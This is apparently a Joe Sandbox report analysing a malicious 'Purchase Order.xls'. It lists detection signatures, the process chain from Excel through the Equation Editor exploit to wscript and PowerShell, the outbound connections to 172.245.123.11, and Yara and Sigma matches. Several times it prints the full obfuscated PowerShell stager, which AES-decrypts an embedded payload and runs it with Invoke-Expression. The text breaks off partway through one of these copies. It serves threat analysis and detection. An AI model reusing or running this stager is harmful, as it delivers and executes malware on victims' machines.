Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.xls

Overview

General Information

Sample name:Purchase Order.xls
Analysis ID:1484765
MD5:687e2dbe29881473305307b385e83aa6
SHA1:19fb4e457a0d672b337941d0c1b4f74dd80d382e
SHA256:b5c3cb22b04a481fa8052965bda8161c48bd9536b0815c1a362555ad5156d336
Tags:xls
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2900 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2304 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3216 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3284 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1ea4:$obj2: \objdata
  • 0x1e90:$obj3: \objupdate
  • 0x1e6b:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1ea4:$obj2: \objdata
  • 0x1e90:$obj3: \objupdate
  • 0x1e6b:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3332JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 3332INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x21ad:$b2: ::FromBase64String(
    • 0x2d90:$b2: ::FromBase64String(
    • 0x4577:$b2: ::FromBase64String(
    • 0x9dd96:$b2: ::FromBase64String(
    • 0xc3bea:$b2: ::FromBase64String(
    • 0xc47fb:$b2: ::FromBase64String(
    • 0xc5627:$b2: ::FromBase64String(
    • 0xc640e:$b2: ::FromBase64String(
    • 0xde2b0:$b2: ::FromBase64String(
    • 0x1045ff:$b2: ::FromBase64String(
    • 0x1059e0:$b2: ::FromBase64String(
    • 0x109473:$b2: ::FromBase64String(
    • 0x10a94f:$b2: ::FromBase64String(
    • 0x10c4d1:$b2: ::FromBase64String(
    • 0x11b6eb:$b2: ::FromBase64String(
    • 0x11c1c5:$b2: ::FromBase64String(
    • 0x11cbcf:$b2: ::FromBase64String(
    • 0x11efc0:$b2: ::FromBase64String(
    • 0x1543eb:$b2: ::FromBase64String(
    • 0x15c88a:$b2: ::FromBase64String(
    • 0x1876e7:$b2: ::FromBase64String(

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.123.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3216, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3216, TargetFilename: C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3216, Protocol: tcp, SourceIp: 172.245.123.11, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOl